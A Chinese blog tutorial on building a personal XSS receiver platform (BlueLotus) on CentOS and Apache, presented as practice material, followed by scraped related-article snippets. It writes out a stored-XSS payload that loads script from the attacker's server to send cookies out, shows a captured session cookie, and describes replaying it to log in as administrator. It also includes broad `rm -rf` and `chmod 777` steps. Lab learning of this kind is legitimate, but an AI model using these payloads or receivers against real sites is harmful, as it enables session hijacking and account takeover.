一、前言

本平台是个人轻量级XSS测试平台,仅作为练习参考。

二、实验环境

服务器操作系统:Centos 7

Web容器:Apache

三、平台搭建过程

安装Apache

安装PHP

安装Git工具

从GitHub克隆XSS平台源码

# 删除默认网站内容

rm  -rf  /var/www/*

# 创建新的网站目录

mkdir  /var/www/xss

从GitHub克隆xss测试源码(https://github.com/firesunCN/BlueLotus_XSSReceiver.git)

git  clone  https://github.com/firesunCN/BlueLotus_XSSReceiver.git  /var/www/xss/

# 给xss目录

chmod  -R  777  /var/www/xss/

配置Apache

# 创建虚拟主机配置文件夹

mkdir  /etc/httpd/conf/vhost

# 创建并编辑虚拟机配置文件

vi  /etc/httpd/conf/vhost/httpd-vhosts.conf

添加以下内容:

<VirtualHost *:80>

DocumentRoot "/var/www/xss"

DirectoryIndex admin.php

</VirtualHost>

# 编辑httpd.conf文件

vi  /etc/httpd/conf/httpd.conf

# 允许使用 .htaccess文件

# 添加之前创建的虚拟主机

Include  /etc/httpd/conf/vhost/httpd-vhosts.conf

# 开机启动Apache服务

chkconfig  httpd  on

# 重新加载Apache配置文件

systemctl  start  httpd

回到浏览器访问服务器结果显示无法访问网站,经过排查是防火墙拦了。

# 命令行配置防火墙开放80端口

firewall-cmd --zone=public --add-port=80/tcp --permanent

# 重启防火墙

systemctl  restart  firewalld

安装XSS平台

# 访问服务器ip地址,点击安装

# 主要修改后台登录密码和数据加密密码,其余保持默认,然后提交

若报错则手动安装,手动安装步骤:

# 首先切换到网站跟目录

cd  /var/www/xss

# 将配置文件改名

mv  config_sample.php   config.php

# 删除install.php文件

rm  -f  install.php

# 若要修改密码信息只需修改config.php文件

安装成功,点击登录

成功登录

功能测试

# 点击我的JS,插入模板,选择Defualt.js,修改网站服务器ip地址

http://192.168.75.129/index.php

# 生成payload

<script src="http://192.168.75.129/myjs/cookie.js"></script>

# 成功获取用户cookie

ASPSESSIONIDCQBSTQBB=BHILNFDBLNPBDMOBFPHNOFBJ

# 利用Google浏览器插件edit this cookie修改cookie登录

到此存储型xss注入获取管理员cookie并登录已经圆满完成。

构造个人轻量级XSS平台获取管理员cookie并登录的更多相关文章

  1. 从零开始搭建轻量级个人XSS平台

    一. 前言 决定搭建XSS平台是因为自己想深入学习一下XSS相关的知识,多多进行实践,上网搜索了一下XSS平台有很多,但是总觉得不是很安全,这个毕竟敏感信息要传输到陌生人的服务器上,而且服务器端测试代 ...

  2. 【web安全】第一弹:利用xss注入获取cookie

    首先一定要先来吐槽一下tipask系统.这是一枚开源的类似百度知道的系统,但是漏洞多多,最基本的XSS注入都无法防御. 言归正传: [准备1] cookie接收服务器. 平时喜欢用sae,所以在sae ...

  3. xss实现获取网站源码

    当网站cookie设置了httponly,xss获取不到到网站的cookie.但是我们是可以获取到网站后台的url. 这时候我们可以xss得到网站后台源码,从而找到网站后台的一些敏感操作:添加用户,删 ...

  4. xss小结-从xss平台搭建到csp规则

    0x00前言 xss是跨站脚本攻击,利用嵌入js代码达到‘控制’对方浏览器的作用,测试的时候我们是用alert(1)弹窗,而做CTF也好,实际中的漏洞利用也好一般是用xss获取管理员的cookie 0 ...

  5. 使用Django简单编写一个XSS平台

    1) 简要描述        原理十分简单2333,代码呆萌,大牛勿喷 >_< 2) 基础知识 XSS攻击基本原理和利用方法 Django框架的使用 3) Let's start 0x01 ...

  6. XSS平台简单使用

    XSS常用语句及编码绕过 XSS常用的测试语句有: <script>alert(1)</script> <img src=x onerror=alert(1)> & ...

  7. 利用VBA+OO4O构造CTAIS开放式通用平台

    利用VBA+OO4O构造CTAIS开放式通用平台 2010-06-08 14:59:28 | 来源:税务信息化论文集 | 作者:于非 易飞 摘  要:文立足于CTAIS系统体系,探讨如何通过OO4O技 ...

  8. 鸡肋点搭配ClickJacking攻击-获取管理员权限

    作者:jing0102 前言 有一段时间没做测试了,偶尔的时候也会去挖挖洞.本文章要写的东西是我利用ClickJacking拿下管理员权限的测试过程.但在说明过程之前,先带大家了解一下ClickJac ...

  9. web安全后渗透--XSS平台搭建及使用

     xss平台搭建 1.申请一个云主机来进行建站:149.28.xx.xx 2.安装lnmp: wget http://soft.vpser.net/lnmp/lnmp1.5.tar.gz -cO ln ...

随机推荐

  1. 消除ADB错误“more than one device and emulator”的方法(转)

    当我连着手机充电的时候,启动模拟器调试,执行ADB指令时,报错.C:\Users\gaojs>adb shellerror: more than one device and emulatorC ...

  2. Dubbo2.7源码分析-Dubbo是如何整合spring-framework的

    这篇文章是Dubbo源码分析的开端,与其说这篇文章是Dubbo源码分析,不如是spring源码分析,因为大部分都是在分析spring如何解析xml配置文件的,为了与后面的Dubbo源码分析保持一致,姑 ...

  3. vue+element ui 的表格列使用组件

    前言:工作中用到 vue+element ui 的前端框架,有这个场景:很多表格的列有许多一样的,所以考虑将列封装为组件.转载请注明出处:https://www.cnblogs.com/yuxiaol ...

  4. c#之new关键词——隐藏基类方法

    当从基类继承了一个(非抽象成员时),也就继承了父类的实现代码.如果是virtual成员,可以override:另外一种方法也能隐藏父类的实现代码(虚成员和非虚成员都可使用):定义与父类相同的方法名,加 ...

  5. 关于DNS缓存

  6. UVA11624(KB1-J)

    Fire! Joe works in a maze. Unfortunately, portions of the maze have caught on fire, and the owner of ...

  7. 倒计时5,4,3,2,1css实现(count down from 5 to 1 using css)

    //count down from 5 to 1, a useful animation. show the code to you:   <!DOCTYPE html> <html ...

  8. CSS选择器之伪类选择器(伪元素)

    selection [CSS4]应用于文档中被用户高亮的部分(比如使用鼠标或其他选择设备选中的部分).(IE8及以下不支持)(火狐-moz-selection) first-line 选择每个 < ...

  9. arcengine 正确绑定办法

    if (!RuntimeManager.Bind(ProductCode.Engine)) { if (!RuntimeManager.Bind(ProductCode.Desktop)) { Mes ...

  10. Android如何使用WebView访问https的网站

    Android中可以用WebView来访问http和https的网站,但是默认访问https网站时,假如证书不被Android承认,会出现空白页面,且不会有任何提示信息,这时我们必须加多一些配置. 此 ...